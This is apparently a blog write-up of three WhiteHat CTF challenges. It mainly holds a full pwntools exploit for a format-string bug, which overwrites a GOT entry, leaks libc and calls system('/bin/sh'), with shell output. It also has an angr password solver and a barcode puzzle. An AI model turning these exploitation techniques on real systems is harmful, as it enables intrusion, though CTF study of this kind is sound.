20170527_Whitehat_chall writeup

I took part in WhiteHat challenge #13 this weekend. In the end I solved 3 challs and got 400pt.

MuiNe

This chall is a Pwn of a format string bug (FSB). The program just echoes the user input once and then finishes execution.
The program may run under ASLR, so I need to know a libc address to pwn it, but the program echoes only once.
How do I solve it?


At first, I try to run the main function more than once in a single execution. If the user input is larger than expected, the stack-smashing protector (SSP) detects this in the last part of execution.

In this check, the __stack_chk_fail function will be called, so I overwrite the GOT entry of __stack_chk_fail with the address of the main function via the FSB.

After the overwrite, I can echo many times (you need to input a string large enough to trigger the __stack_chk_fail call).

# got of __stack_chk_fail to start of main function(0x0804851B) to be able to loop
data = p32(0x0804A014)+p32(0x0804A015)+p32(0x0804A016)+p32(0x0804A017)
data += "%11c%7$hhn"
data += "%106c%8$hhn"
data += "%127c%9$hhn"
data += "%4c%10$hhn"


Then I leak libc address information and calculate the system address (execute "p system" in gdb), the /bin/sh address (execute "find /bin/sh" in gdb) and the exit address (execute "p exit" in gdb).

# Leak information by format string
data = "%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x"
r.sendline(data)
l = r.recvuntil("echo ")
print l.split(",")[4]

# calculate offset of each address and add libc_base.
libc_base = int(("0x"+l.split(",")[4]),16) - 0x4538  # offset of the leaked pointer within libc
system_addr = libc_base + 0x3ada0
bin_sh_addr = libc_base + 0x15b82b
exit_addr = libc_base + 0x2e9d0
print hex(libc_base)


Finally I want to execute the system function via a stack buffer overflow (BoF), but I can't, because "lea     esp, [ecx-4]" in the last part of the main function moves esp to a location that I can't control with the BoF.

So to avoid this, I call a leave; ret gadget instead, which moves the stack pointer to the place I overflowed, by overwriting the GOT entry of __stack_chk_fail once again.

The whole script is as below.

from pwn import *

target = "formatme.wargame.whitehat.vn"
port = 1337
r = remote(target, port)
raw_input()  # pause here to attach a debugger if needed
l = r.recvuntil("echo ")
print l

# 1st input: overwrite the GOT entry of __stack_chk_fail (0x0804A014) byte by byte
# with the start of the main function (0x0804851B) to be able to loop
data = p32(0x0804A014)+p32(0x0804A015)+p32(0x0804A016)+p32(0x0804A017)
data += "%11c%7$hhn"
data += "%106c%8$hhn"
data += "%127c%9$hhn"
data += "%4c%10$hhn"
print data
r.sendline(data)
l = r.recvuntil("echo ")

# 2nd input: leak information by format string; the 5th value is a libc pointer
data = "%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x"
r.sendline(data)
l = r.recvuntil("echo ")
print l.split(",")[4]

# calculate offset of each address and add libc_base.
libc_base = int(("0x"+l.split(",")[4]),16) - 0x4538  # offset of the leaked pointer within libc
system_addr = libc_base + 0x3ada0
bin_sh_addr = libc_base + 0x15b82b
exit_addr = libc_base + 0x2e9d0
print hex(libc_base)

'''
First I need to avoid the code below.
_text:080485A3 03C 8B 4D FC       mov     ecx, [ebp+var_4]
_text:080485A6 03C C9             leave
_text:080485A7 000 8D 61 FC       lea     esp, [ecx-4]
So I use the gadget below to avoid that part
0x08048488: leave  ; rep ret  ;  (1 found)
and execute the system function
'''
# 3rd input: overflow the buffer with the system/exit/"/bin/sh" frame, then overwrite
# the GOT entry of __stack_chk_fail again with the leave; ret gadget (0x08048488),
# so the overflowed frame is used instead of the original epilogue of main
data = "AAAA"*4*3+p32(system_addr)+p32(exit_addr)+p32(bin_sh_addr)
data += p32(0x0804A017)+p32(0x0804A016)+p32(0x0804A015)+p32(0x0804A014)
data += "%188c%22$hhn"
data += "%252c%23$hhn"
data += "%128c%24$hhn"
data += "%4c%25$hhn"
print data
r.sendline(data)
r.interactive()
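The field widths in both %hhn chains above (11/106/127/4 and 188/252/128/4) follow from printf's running character count. Here is an added example, not part of the original writeup, that recomputes them from the GOT address, the target values and the byte order the script uses; the prefix lengths and the positional indices 7 and 22 are taken from the script, and the helper names are my own.

```python
import struct

# Values taken from the writeup; everything else is constructed for this example.
GOT_STACK_CHK_FAIL = 0x0804A014   # GOT entry of __stack_chk_fail
MAIN_ADDR = 0x0804851B            # start of main(): first overwrite target
LEAVE_RET_GADGET = 0x08048488     # "leave ; rep ret": second overwrite target


def hhn_widths(already_printed, value, byte_order):
    """Field widths for a chain of %Nc%k$hhn writes.

    printf keeps one running character count and %hhn stores its low byte.
    For each target byte we pad the count until its low byte matches.
    byte_order lists byte indices of `value` (0 = least significant) in
    the order the %hhn conversions are applied.
    """
    printed = already_printed
    widths = []
    for idx in byte_order:
        want = (value >> (8 * idx)) & 0xFF
        pad = (want - printed) % 256
        if pad == 0:
            pad = 256          # %Nc prints at least one char, so wrap fully
        printed += pad
        widths.append(pad)
    return widths


def simulate_hhn(already_printed, widths, byte_order):
    """Replay the chain and return the 32-bit value the %hhn writes produce."""
    printed = already_printed
    value = 0
    for pad, idx in zip(widths, byte_order):
        printed += pad
        value |= (printed & 0xFF) << (8 * idx)
    return value


def build_fmt_write(got_addr, value, first_arg, prefix=b"", reverse=False):
    """prefix + four little-endian byte addresses + the %Nc%k$hhn chain.

    first_arg is the printf positional index of the first address on the
    stack (7 and 22 in the writeup); reverse=True places the addresses
    high byte first, as the second payload does.
    """
    order = [3, 2, 1, 0] if reverse else [0, 1, 2, 3]
    payload = prefix + b"".join(struct.pack("<I", got_addr + i) for i in order)
    widths = hhn_widths(len(payload), value, order)
    for n, w in enumerate(widths):
        payload += b"%%%dc%%%d$hhn" % (w, first_arg + n)
    return payload, widths
```

simulate_hhn is the check to run on any hand-written chain: if it does not return the intended address, a width or the byte order is off.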


$ python solve_fomat_me.py
[+] Opening connection to formatme.wargame.whitehat.vn on port 1337: Done
echo
\x14\xa0\x0\x15\xa0\x0\x16\xa0\x0\x17\xa0\x0%11c%7$hhn%106c%8$hhn%127c%9$hhn%4c%10$hhn
f75cc538
0xf75c8000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0-`��i_�+8r��\x16\xa0\x0\x15\xa0\x0\x14\xa0\x0%188c%22$hhn%252c%23$hhn%128c%24$hhn%4c%25$hhn
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0-`��i_�+8r��\x16\xa0\x0\x15\xa0\x0\x14\xa0\x0                                                                                                                                                                                           \x00                                                                                                                                                                                                                                                                                                                                                                                          \x0
$
$
$
$ ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
my_ssh_key
my_ssl_key
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cd home
$ ls
format_me
ubuntu
$ cd format_me
$ ls
flag
format_meb1946ac92492d2347c6235b4d2611184
$ cat flag
%n_was_a_good_idea?
$


Finally I got the flag and calculated SHA1("%n_was_a_good_idea?").


Tuy Hoa


This is an RE problem that can be solved with angr.

I found that I can get the flag if execution reaches 0x400ea8, and if the password is wrong, it goes to 0x40096d.

(Screenshot_1, Screenshot_2)

So I write a script using angr as below.
import angr

def main():
    # surveyors.Explorer is the legacy angr API used at the time of the writeup;
    # the current equivalent is p.factory.simgr().explore(find=..., avoid=...)
    p = angr.Project("./re100", load_options={'auto_load_libs': False})
    ex = p.surveyors.Explorer(find=(0x400EA8, ), avoid=(0x40096D,))
    ex.run()
    # stdin of the state that reached the "good password" block is the password
    return ex.found[0].state.posix.dumps(0).strip('\0\n')

def test():
    assert main() == ''

if __name__ == '__main__':
    print main()


$ python solve_re100.py
5a62af9a23b56ee49370808a0cf1e8096757257@@@@@@@@@@@@@@@
@@@@
$ ./re100
input password:
5a62af9a23b56ee49370808a0cf1e80967572570
Good password!!!


Hue


This problem is related to several kinds of barcode.

At first I am given a password-locked ZIP file and many PNG files that contain country flags.

Among the image files, there are strange ones that seem to be parts of a QR code, so I try to recover it.

After decoding it, I get the ZIP password.

Then I get the image file below. I read the problem description again, and there is a strange string "Dot Code".

I googled it and found a DotCode solver:

http://ift.tt/2qvPodn

(You need to install it on Android/iOS, and don't forget to enable DotCode in the settings.)

And I get the flag.


1 thought on “20170527_Whitehat_chall writeup”

  1. Instead of finding “/bin/sh”, you could also overwrite the address of the “echo” string which was passed to printf() with “sh”.
